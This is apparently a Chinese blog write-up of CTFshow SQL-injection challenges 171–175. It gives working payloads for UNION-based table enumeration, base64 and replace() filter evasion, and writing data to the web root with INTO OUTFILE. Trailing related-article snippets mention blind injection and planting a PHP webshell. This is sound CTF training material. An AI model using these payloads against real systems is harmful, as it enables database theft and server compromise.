CTFshow web(sql注入171-175)

最新推荐文章于 2025-03-15 01:07:48 发布
原创 最新推荐文章于 2025-03-15 01:07:48 发布 · 952 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器 #CTFshow #SQL注入

本文讲述了在WebCTF挑战中,如何利用SQL注入技巧获取表名,绕过过滤函数,对密码进行Base64编码混淆,以及如何通过文件操作来提取隐藏信息的过程。

                                                                 web171

还得先爆表名

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

注意这里已经提示你了,只要知道是ctfshow_user,就可以拿到flag

-1' union select 1,2,password from ctfshow_user where username = 'flag' --+

                                                                         web172

还是那个语句查询表名

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

然后接着一个个查询看看哪个表里面有flag,经测试,第二个表有flag 

-1' union select 1,2,password from ctfshow_user2 where username = 'flag' --+

                                                                        web173

还是那个语句查询表名

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

那个过滤函数别被骗了,照样该怎么做怎么做 

-1' union select 1,2,password from ctfshow_user3 where username = 'flag' --+

                                                                    web174

根据upstream_yu大神的思路:

替换:将数据to_base64加密,然后将里面所有的数字用replace()替换

-1' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),2,'testb') ,3,'testc') ,4,'testd') ,5,'teste') ,6,'testf') ,7,'testg') ,8,'testh') ,9,'testi') ,0,'testj') ,1,'testa'),replace(1,'1','testa') from ctfshow_user4 where username='flag'--+

base64解码就好

                                                                    web175

原理:把内容写入文件读取

 1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+

 然后访问1.txt

ps:注意把ctfshow后面的都删去,改成1.txt

真心希望文章能够帮助大家,谢谢!

补天阁
关注
ctfshow web175-183
akxnxbshai的博客
03-14 6459
Web 175 if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))) 刚开始不知道这句话是什莫意思,还在尝试之前的方法,发现没用。 \xnn 匹配ASCII代码中十六进制代码为nn的字符 [\x00-\x7f] 匹配ASCII值从0-127的字符 所以ASCII值得0-127都被过滤了,select没法用了。 只能盲注了,试一下 1' and sleep(6)--+ 发现确实有延迟,所以可以考虑时间盲注。 时间盲注: 通过时间
ctfshow web入门 SQl注入web171--web179
2301_81040377的博客
04-18 689
就能一次性查出25和26的,如果25存在就直接输出flag了,不然的话26存在也行。反正这种盲注问题用脚本就行了学的话看一下这篇文章。过滤了很简单的,当然是select啦,大小写绕过。还用用脚本注入的,但是我还没有成功过所以就…时间盲注,参考下面的文章,还是脚本做。,9999不存在时会查询id=3。我不知道怎么整的,看出是布尔盲注。进行猜测表格的id只有24个。没反应没事我们直接访问试试。是网站文件默认存放位置。本地测试,查询id为。还是base64解码。
ctfshow_web175
qq_38634097的博客
05-28 583
0-127表示单字节字符:数字,英文字符,半角符号,以及某些控制字符。那我们换个思路,不让在页面显示,写在某个文件里,然后查看文件内容。\xnn 匹配ASCII代码中十六进制代码为nn的字符。[x00-x7f] 匹配ASCII值从0-127的字符。打开场景可以看到在本题中,页面的拦截方式做了改变。也就说,是以上字符的不会在页面显示出来。
ctfshow SQL注入Web175
m0_62584974的博客
05-01 1021
查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;"; 返回逻辑 //检查结果是否有flag if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){ $ret['msg']='查询成功'; } Play...
ctfshow-web入门-sql注入web171-web175
Welcome To Myon'Blog !
07-31 2847
这里只出了一个 id,因为换行导致我们误判为到了最后一个字符,因为我们的字典里只包括数字、小写字母和下划线,因此字符没找到,便跳出外层循环结束了代码。判断一下这次又是三个字段数了,因为还是对输出过滤了 flag,所有我们还是不查用户名,用占位符占位即可。接下来我们先判断下它数据库名的长度,这个其实可以通过 burpsuite 的攻击模块爆破的,没关系,我们这里手写一遍,也锻炼下我们 python 的能力。
ctfshow-web175详细解答
weixin_68408599的博客
04-22 489
打开hackbar在里面post传值中输入1=phpinfo();抓包显示输入错误,在头部ctf.show/后输入1.php(植入的文件)1=system("ls");可以看见api目录,进入1=system("ls ./api/");传递,$_POST[1]参数包含一串可执行代码,然后使用此参数调用。信息都已经出来,在蚁剑中进行数据操作得到以下数据。通过此条语句进行植入代码,代码将作为。
ctfshow sql注入 web234--web241
2301_81040377的博客
07-03 514
如果说为什么要在insert.php进行注入的话,我不知道你注意前面的注入没有都是在相应的php页面进行的。回来刷新就有flag了,我调了一会笑死了,之前的脚本居然没起到注入的作用然后又在那里慢慢调。这个脚本我写了很久,因为我之前并没有完全理解try,except,现在懂了。api是一个url的接口,所以我们在这里实现注入。这里我们直接闭合username然后就行。过滤之后,我们还有另外两个能够使用的库。看到页面没有注入的地方我们访问api。脚本还是比较简单的我就不解释了。被过滤了,所以我们用。
ctfshow web sql注入 web242--web249
2301_81040377的博客
07-03 657
mid和limit都行,我比较喜欢用mid。用这两个替换floor这个向下取整函数。into outfile 的使用。用.user.ini包含。
CTFshowweb171~180---SQL注入(1)
金 帛的博客
06-04 3811
ctfshowSQL注入的wp
ctfshow- sql注入(web入门)
..
11-19 2043
web174 这道题可以先在查询框中随便查询1或2或3,发现没有回显,猜测一下可能是盲注。 首先用bp抓包试一下,得到关键信息 http://f5096abc-7db4-4448-8da0-fccd604899d9.challenge.ctf.show/api/v3.php?id=11&page=1&limit=10 用脚本尝试一下没有回显信息,根据前面的经验,这是第四题尝试改为v4.php?id=1,发现出现回显信息。 我们可以这样写脚本 import r.
ctfshow web入门sql注入175
2401_84499748的博客
03-15 459
在这里我做的时候有点懵,那这个该怎么做呢,也有写脚本的,蛋对于我这种更改学了几个月的新手来说有点太难理解了,然后我看来下其他大佬的wp,我发现我们可以不在这个页面上访问到我们的flag,可以通过我们的查询,吧我们查询到的内容写到一个知道的目录下,然后我就找到了这个。然后我们知道了这个路径的话就可以在这里进行相关的文章操作了,在这里我找到了两种方法,首先就是我们的吧flag写到另外一个文件里面去,然后访问这个文件。这个就是我这道题的具体的写法,有一些细节的问题还是请各位佬海量。随后还是访问这个文件。
CTFSHOW web入门——web172
m0_74093152的博客
03-26 480
知道了数据库名字是ctfshow_web,有ctfshow_user和ctfshow_user2两张表。1’ order by 2--+的时候没有报错,而3的时候报错,说明该表有两列。有三个列id,username,password。首先判断有无注入点,页面有变化,因此存在注入点。接着查询ctfshow_user2中的列。查询password中的数据。
ctfshow-web入门-web172
绘梨衣の沉默的博客。主要是CTF竞赛,网络安全,渗透测试,HVV,以及学习到的各种知识的分享
10-25 1166
第四步:使用database(),查询数据库 1' union select 1, database() --+第一步:确定sql注入的类型。1' or 1=1 确定为字符型(根据上面的php代码也能确定)应该使用下列查询语句:加个括号。第二步:使用order by确定列数 1' order by 3 --+第三步:测试回显位:1' union select 1,2 --+该题目与上一个题目不是同一个类型,该题目需要进行sql联合查询。第二个x代表是需要确定是有几个列,并且确定回显字段。
CTFshow web入门web172-sql2
weixin_74336671的博客
11-15 255
直接:' union select 1,password from ctfshow_user2 where username='flag'--+返回结果中的username不允许等于flag,不输出username不就完事了,这里应该过滤ctfshow才有意义。
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 512
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
CTFSHOW web入门 sql注入 无过滤注入 web171-175
sinat_41572027的博客
07-07 2026
ctfshow web171-174
适合小白ctfshow-web入门—sql注入175-248超详细解析!!
2201_75930505的博客
09-12 957
将数据输出到一个文件中,然后访问对应文件: 这是一个UNION查询,它将原始查询的结果与从表中选择的用户名和密码进行合并。: 这部分似乎是将查询结果导出到文件。路径表示要将查询结果写入到位于网页根目录下的名为1.txt的文件中。(路径是一个常见的用于存放网页文件的目录,通常被称为网页根目录。在许多Web服务器中,这个目录被设置为存放网站的主要文件,因此可以通过浏览器访问。
CTFshow-web入门171sql注入
Hunter909的博客
10-12 306
username若是对于flag就会被屏蔽、隐藏(没有办法去改变username!=flag),但是会发现ID排序是有顺序的,就可以慢慢试id = 25,id = 26......发现id=26时,flag会出来。因为$sql = "select username,password from user where username!这里是具有sql注入漏洞的,它这里没有限定条件,直接运用简单的sql注入把隐藏的flag找出来就行。
CTFSHOW web入门——web171
m0_74093152的博客
03-26 548
查询用户名为flag的信息 1' union select id,username,password from ctfshow_user where username='flag' --+然后查询库名 1' union select 1,2,database() --+首先查询有多少列,1' order by 3--+查看ctfshow_web库的表。
ctfshow web入门 sql注入175
最新发布
03-23
### CTFShow Web 入门 SQL 注入175题 解法 CTFShow 平台中的 Web 入门级别 SQL 注入题目旨在帮助学习者掌握不同场景下的 SQL 注入技巧。对于第 175 题,其核心在于利用无过滤注入的特点来完成攻击目标。 #### 背景分析 在该题目中,查询语句允许通过 `UNION SELECT` 构造额外的数据集并将其写入到指定文件路径下[^2]。具体来说,攻击者可以借助此特性提取数据库内的敏感数据,并将这些数据存储至可访问的位置以便后续查看。 以下是实现这一过程的关键点: 1. **构造 UNION 查询** 使用 `UNION SELECT` 将目标表中的字段值附加到原始查询结果集中。例如,在本题中可以通过如下方式获取用户密码: ```sql 1' union select 1, password from ctfshow_user5 -- ``` 2. **导出数据到外部文件** 利用 MySQL 的 `INTO OUTFILE` 子句将查询结果保存为服务器上的文件。这一步骤需要确保所选路径具有写权限以及符合服务端配置的安全策略。 ```sql INTO OUTFILE '/var/www/html/1.txt' ``` 3. **绕过潜在限制** 如果存在单引号 `'` 或其他字符被转义的情况,则需采用替代方法构建有效载荷。比如使用双划线 (`--`) 表示注释从而忽略剩余部分;或者尝试基于时间盲注等方式间接验证逻辑条件成立与否。 最终提交完整的请求参数形式可能类似于下面这样: ```plaintext id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'-- ``` 成功执行上述操作之后,可通过浏览器访问 `/1.txt` 文件读取其中的内容即为目标 flag 值。 #### 总结 此类题目主要考察选手对基础 SQL 注入原理的理解程度及其实际应用能力。通过对真实环境模拟练习能够加深印象进而提升防御意识水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值